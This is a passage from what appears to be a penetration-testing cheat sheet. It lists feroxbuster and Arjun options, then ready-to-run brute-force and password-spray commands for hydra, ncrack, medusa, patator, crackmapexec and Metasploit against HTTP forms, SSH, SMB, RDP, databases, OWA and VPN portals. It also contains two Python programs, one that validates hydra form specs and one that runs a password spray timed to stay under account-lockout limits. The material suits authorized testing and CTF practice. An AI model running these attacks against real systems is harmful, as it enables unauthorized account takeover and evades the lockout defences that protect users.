-r Allow client to follow redirects
-T Number of seconds before a client's request times out (default: 7)
--data Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-b, --cookies Specify HTTP cookies to be used in each request (ex: -b stuff=things)
--resume-from State file from which to resume a partially complete scan
--burp Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart Set --extract-links, --auto-tune, --collect-words, and --collect-backups to true
--thorough Use the same settings as --smart and set --collect-extensions to true
--force-recursion Force recursion attempts on all 'found' endpoints (still respects recursion depth)
## ------------------| Response filters
-C Filter out status codes (deny list) (ex: -C 200 -C 401)
-N Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-s Status Codes to include (allow list) (default: 200 204 301 302 307 308 401 403 405)
-S Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-W Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-X Filter out messages via regular expression matching on the response's body (ex: -X '^ignore me$')
## ------------------| Dynamic collection settings
-B Automatically request likely backup extensions for "found" urls
-E Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-g Automatically discover important words from within responses and add them to the wordlist
-I File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)
## ------------------| Output settings
--no-state Disable state output file (*.state)
--silent Only print URLs + turn off logging (good for piping a list of urls to other commands)
-o Output file to write results to (use w/ --json for JSON entries)
-q Hide progress bars and banner (good for tmux windows w/ notifications)
-v Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)
Best Usage
feroxbuster -k -f -A -u <URL>
03.6 Arjun
## ------------------| Setup
apt-get install arjun
pip3 install arjun
## ------------------| Usage
arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST
arjun -u https://api.example.com/endpoint -m JSON --include='{"root":{"a":"b",$arjun$}}'
04. Brute-force Basic
04.1 HTTP
Common useful flags
hydra -u -f -t 10 -w 30 -L users.txt -P pass.txt 192.168.1.69 http-post-form "/login.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt
# Host : 192.168.1.69
# Method : http-post-form / https-post-form / http-get-form / https-get-form / http-get (basic auth)
# URI : /login.php
# Form parameters : user=^USER^&pass=^PASS^
# Failure response : Bad login
# -L : users.txt
# -l : username
# -P : pass.txt
# -t : Threads
# -w : Wait for timeout
# -S : Perform an SSL connect [https]
# -s : If the service is on a different default port
# -o : Output file
# -f : exit when a login/pass pair is found
# -R : Restore a previous aborted/crashed session
# -I : Ignore an existing restore file
# -u : Loop around users, not passwords (effective! implied with -x)
## If you want proxy export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
https-post-form
hydra -S -u -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"
http-get (basic auth) / Tomcat
hydra -u -f -l admin -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 10.10.10.157 http-get "/monitoring"
With headers
hydra 192.168.1.69 http-post-form "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo" \
-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt
# in this case we specify that the cookie should be page/cookie
# cookies can be specified with C=
# and we also added an header with H=
# this header is called X-Foo and has as value Foo
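The form specification string is where most hydra http-*-form mistakes happen: fields are colon-separated, the third field is the condition (a failure string by default, S=/F= to be explicit), and C=/H= options follow. The Python below is an added example for this page (not hydra's code) that parses a spec in hydra's syntax, substitutes ^USER^/^PASS^ into the body, and evaluates the condition against a response body, so a spec can be sanity-checked before a run. It assumes hydra's documented \: escape for literal colons and URL-encodes the substituted values (hydra does its own encoding); real hydra matches the condition against the whole response, this checks only the text you pass in.

```python
"""Added example (not hydra's code): parse and sanity-check a hydra
http-post-form specification string."""
from urllib.parse import quote


def split_unescaped(spec):
    """Split on ':' but honour hydra's '\\:' escape for literal colons."""
    fields, cur, i = [], "", 0
    while i < len(spec):
        if spec[i] == "\\" and i + 1 < len(spec) and spec[i + 1] == ":":
            cur += ":"
            i += 2
        elif spec[i] == ":":
            fields.append(cur)
            cur = ""
            i += 1
        else:
            cur += spec[i]
            i += 1
    fields.append(cur)
    return fields


def parse_form_spec(spec):
    """'/path:form:condition[:C=cookiepath][:H=Name: Value]...' -> dict.
    The condition is a failure string unless prefixed with S= (success) or F=."""
    fields = split_unescaped(spec)
    if len(fields) < 3:
        raise ValueError("spec needs at least path:form:condition")
    path, body, cond = fields[0], fields[1], fields[2]
    if "^USER^" not in body and "^PASS^" not in body:
        raise ValueError("form body has neither ^USER^ nor ^PASS^; nothing would be brute-forced")
    out = {"path": path, "body": body, "success": None, "failure": None,
           "cookie_path": None, "headers": {}}
    if cond.startswith("S="):
        out["success"] = cond[2:]
    elif cond.startswith("F="):
        out["failure"] = cond[2:]
    else:
        out["failure"] = cond
    rest, i = fields[3:], 0
    while i < len(rest):
        opt = rest[i]
        if opt.startswith("C="):
            out["cookie_path"] = opt[2:]
        elif opt.startswith("H="):
            # 'H=X-Foo: Foo' was split at the header's own colon: name here, value next.
            name = opt[2:].strip()
            value = rest[i + 1].strip() if i + 1 < len(rest) else ""
            out["headers"][name] = value
            i += 1
        else:
            raise ValueError(f"unknown option {opt!r}")
        i += 1
    return out


def build_body(parsed, user, password):
    """Substitute the placeholders. Values are URL-encoded so an '&' or '=' in a
    password cannot split the form into extra parameters."""
    return (parsed["body"]
            .replace("^USER^", quote(user, safe=""))
            .replace("^PASS^", quote(password, safe="")))


def login_succeeded(parsed, response_body):
    """Hydra's decision: with S= the string must appear; with F= (or a bare
    string) it must be absent. Getting this backwards reports every pair as valid."""
    if parsed["success"] is not None:
        return parsed["success"] in response_body
    return parsed["failure"] not in response_body


if __name__ == "__main__":
    spec = "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo"
    p = parse_form_spec(spec)
    print(p)
    print(build_body(p, "admin", "p&ss=word"))
    print(login_succeeded(p, "<html>success</html>"), login_succeeded(p, "<html>Bad login</html>"))
```

Before a run, fetch one failed login yourself and feed its body to login_succeeded: if it returns True, the condition string is wrong (typically a substring that also appears on the failure page) and hydra would report every password as valid.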
04.2 SSH
## ------------------| Using Hydra
hydra -v -V -u -f -L users.txt -p "Password!" -t 2 $ip ssh
hydra -v -V -u -f -l root -P /usr/share/wordlists/rockyou.txt -t 2 $ip ssh
hydra -v -V -u -f -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 $ip ssh
## -v Verbose mode
## -L User list
## -P Password list
## -V Show login+pass for each attempt
## -u Loop around users, not passwords (effective! implied with -x)
## -o Write found login/password pairs to FILE instead of stdout
## -t Run TASKS number of connects in parallel per target (default: 16); keep it at 4 or below for SSH, sshd limits parallel unauthenticated connections (MaxStartups) and drops the extra ones
## -f / -F Exit when a login/pass pair is found (-M: -f per host, -F global)
## ------------------| Using NCrack
ncrack -v -p 22 --user root -P /usr/share/wordlists/rockyou.txt <IP> -T5
## ------------------| Using Patator
patator ssh_login host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0
patator ssh_login -x ignore:fgrep='failed' host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0
## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M ssh
04.3 SMB
## ------------------| Using Nmap
nmap --script smb-brute -p 445 <IP>
## ------------------| Using CrackMapExec
crackmapexec smb <IP> -u users.txt -p /usr/share/wordlists/rockyou.txt --continue-on-success
crackmapexec smb <IP> -u Hazard -p /usr/share/wordlists/rockyou.txt --shares
## ------------------| Using Hydra
hydra -u -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
04.4 RDP
## ------------------| Using Hydra
hydra -t 1 -V -f -u -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
hydra -V -f -u -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt rdp://<IP>
## ------------------| Using NCrack
ncrack -vv --user <UserName> -P /usr/share/wordlists/rockyou.txt rdp://<IP>
## ------------------| Using Crowbar
crowbar -b rdp -s <IP>/CIDR -u <USER> -C /usr/share/wordlists/rockyou.txt
crowbar -b rdp -s <IP>/CIDR -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -C /usr/share/wordlists/rockyou.txt
04.5 LDAP
## ------------------| Nmap (Basic)
nmap --script ldap-brute -p 389 <IP>
## ------------------| Using Hydra
hydra -V -f -u -L users.txt -P /usr/share/wordlists/rockyou.txt <IP> ldap2
## ------------------| Using CrackMapExec
crackmapexec ldap <IP> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt
04.6 FTP
## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt [-t 32] <IP> ftp
## ------------------| Using Ncrack
ncrack -p 21 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]
## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp
04.7 SNMP
## ------------------| Using Nmap
nmap -sU --script snmp-brute <IP> [--script-args snmp-brute.communitiesdb=<wordlist> ]
## ------------------| Using Hydra
hydra -u -f -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP> snmp
## ------------------| Using MSF
use auxiliary/scanner/snmp/snmp_login
## ------------------| Using onesixtyone
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
04.8 SMTP
hydra -u -f -V -l <username> -P /usr/share/wordlists/rockyou.txt <IP> smtp
### If you need TLS add -S (implicit TLS, usually port 465) and the port with -s; the service name is still required. On 587 the server normally offers STARTTLS, which hydra's smtp module negotiates itself, so try without -S first
hydra -u -f -S -v -V -l <username> -P /usr/share/wordlists/rockyou.txt -s 587 <IP> smtp
04.9 WinRM
## ------------------| Using CrackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt
04.10 MySQL
## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt -s 3306 <IP> mysql
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> mysql
04.11 MSSQL
## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt <IP> mssql
## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M mssql
## ------------------| Using Nmap
### Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt,ms-sql-brute.brute-windows-accounts <IP>
## ------------------| Using Metasploit
## If you have a domain, set DOMAIN and USE_WINDOWS_AUTHENT true
use auxiliary/scanner/mssql/mssql_login
04.12 MongoDB
## ------------------| Using Nmap
nmap -sV --script mongodb-brute -n -p 27017 <IP>
## ------------------| Using Metasploit
use auxiliary/scanner/mongodb/mongodb_login
04.13 OracleSQL
## ------------------| Using Nmap
sudo nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
### Offline hash brute (captures the login challenge, then cracks offline; works against versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
sudo nmap -p 1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n <IP>
## ------------------| Using Patator
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
## ------------------| Using ODAT (Oracle Database Attacking Tool)
./odat.py passwordguesser -s <SERVER_IP> -d <SID>
./odat.py passwordguesser -s <SERVER_IP> -p <PORT> --accounts-file accounts_multiple.txt
## ------------------| Using Metasploit
use auxiliary/admin/oracle/oracle_login
## or
use auxiliary/scanner/oracle/oracle_login
set RHOSTS <IP>
set RPORT 1521
set SID <SID>
04.15 PostgreSQL
## ------------------| Using Hydra
hydra -u -f -L usernames.txt -P /usr/share/wordlists/rockyou.txt <IP> postgres
## ------------------| Using Medusa
medusa -h <IP> -U usernames.txt -P /usr/share/wordlists/rockyou.txt -M postgres
## ------------------| Using Ncrack
ncrack -v -U usernames.txt -P /usr/share/wordlists/rockyou.txt <IP>:5432
## ------------------| Using Patator
patator pgsql_login host=<IP> user=FILE0 0=usernames.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt
## ------------------| Using Metasploit
use auxiliary/scanner/postgres/postgres_login
## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
04.16 Telnet
## ------------------| Using Hydra
hydra -u -f -l <username> -P /usr/share/wordlists/rockyou.txt telnet://targetname
## ------------------| Using Ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]
## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M telnet
04.17 VNC
## ------------------| Using Hydra
### classic VNC authentication is password-only, so no user list is needed
hydra -f -V -P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> vnc
## ------------------| Using Medusa
medusa -h <IP> -u root -P /usr/share/wordlists/rockyou.txt -M vnc
## ------------------| Using Ncrack
ncrack -V --user root -P /usr/share/wordlists/rockyou.txt <IP>:5900
## ------------------| Using Patator
patator vnc_login host=<IP> password=FILE0 0=/usr/share/wordlists/rockyou.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
## ------------------| Using Metasploit
use auxiliary/scanner/vnc/vnc_login
## ------------------| Using Nmap
nmap -sV --script vnc-brute --script-args passdb=/usr/share/wordlists/rockyou.txt -p 5900 <IP>
04.18 IRC
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p <PORT> <IP>
04.19 ISCSI
nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 3260 <IP>
04.20 PPTP
cat /usr/share/wordlists/rockyou.txt | thc-pptp-bruter -u <Username> <IP>
04.21 Redis
## ------------------| Using Nmap
nmap --script redis-brute -p 6379 <IP>
## ------------------| Using Hydra
hydra -u -f -P /usr/share/wordlists/rockyou.txt <IP> redis
## ------------------| Using MSF
use auxiliary/scanner/redis/redis_login
04.22 Rexec
hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rexec://<Victim-IP>
04.23 Rlogin
hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rlogin://<Victim-IP>
04.24 OWA
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt
## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
## ------------------| Using Spray.sh
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
04.25 Lync
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
04.26 CISCO Web VPN
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
04.27 OpenVPN Web Portal
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
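All four spray.sh invocations take the same two lockout parameters. The Python below is an added example for this page (not spray.sh) that turns a user list, a password list and those two numbers into batches: each password in a batch is tried against every user before the next one, the run sleeps the lockout period between batches, and an account is not hit again once its password is found. It takes the attempts-per-period figure at face value, so check the domain's lockout threshold and observation window first (net accounts, or Get-ADDefaultDomainPasswordPolicy) and use fewer attempts than the threshold; the user and password lists in the demo are constructed, and the login function is whatever transport you have (OWA, Lync, the VPN portal).

```python
"""Added example (not spray.sh): plan and run a lockout-aware password spray."""
import time


def plan_spray(users, passwords, attempts_per_period, period_minutes, lockout_threshold=None):
    """Split the password list into batches of attempts_per_period passwords.
    Every password in a batch is tried against every user (one attempt per
    account per password); the run sleeps period_minutes before the next batch.
    lockout_threshold, if given, is the domain policy value a batch must stay below."""
    if attempts_per_period < 1:
        raise ValueError("attempts_per_period must be at least 1")
    if lockout_threshold is not None and attempts_per_period >= lockout_threshold:
        raise ValueError(
            f"{attempts_per_period} attempts per period would reach the lockout "
            f"threshold of {lockout_threshold}; use at most {lockout_threshold - 1}")
    batches = []
    for i in range(0, len(passwords), attempts_per_period):
        chunk = passwords[i:i + attempts_per_period]
        batches.append({
            "passwords": chunk,
            "pairs": [(u, p) for p in chunk for u in users],   # password-major order
            "sleep_minutes": period_minutes,
        })
    if batches:
        batches[-1]["sleep_minutes"] = 0   # nothing follows the last batch
    return batches


def total_minutes(batches):
    """Wall-clock lower bound for the run (waiting only, request time not counted)."""
    return sum(b["sleep_minutes"] for b in batches)


def run_spray(batches, try_login, sleep=time.sleep):
    """Execute a plan. try_login(user, password) -> bool is the transport-specific
    check; sleep is injectable so the plan can be tested without waiting.
    Accounts already cracked are skipped: it saves attempts and avoids locking
    out an account whose password is already known."""
    found, done = [], set()
    for b in batches:
        for user, password in b["pairs"]:
            if user in done:
                continue
            if try_login(user, password):
                found.append((user, password))
                done.add(user)
        if b["sleep_minutes"]:
            sleep(b["sleep_minutes"] * 60)
    return found


# Constructed demo input (not real accounts or a real password list).
DEMO_USERS = ["alice", "bob"]
DEMO_PASSWORDS = ["Winter2023!", "Spring2024!", "Summer2024!", "Autumn2024!",
                  "Password1", "Welcome1", "Company2024"]

if __name__ == "__main__":
    plan = plan_spray(DEMO_USERS, DEMO_PASSWORDS, attempts_per_period=3,
                      period_minutes=30, lockout_threshold=5)
    print(f"{len(plan)} batches, at least {total_minutes(plan)} minutes of waiting")
    # The demo 'login' succeeds for one constructed pair; no sleeping in the demo.
    hits = run_spray(plan, lambda u, p: (u, p) == ("bob", "Spring2024!"), sleep=lambda s: None)
    print("found:", hits)
```

The number to respect is the observation window (the time after which the bad-password counter resets), not the lockout duration; if the policy resets the counter after 30 minutes, period_minutes must be at least 30 even when locked accounts unlock sooner.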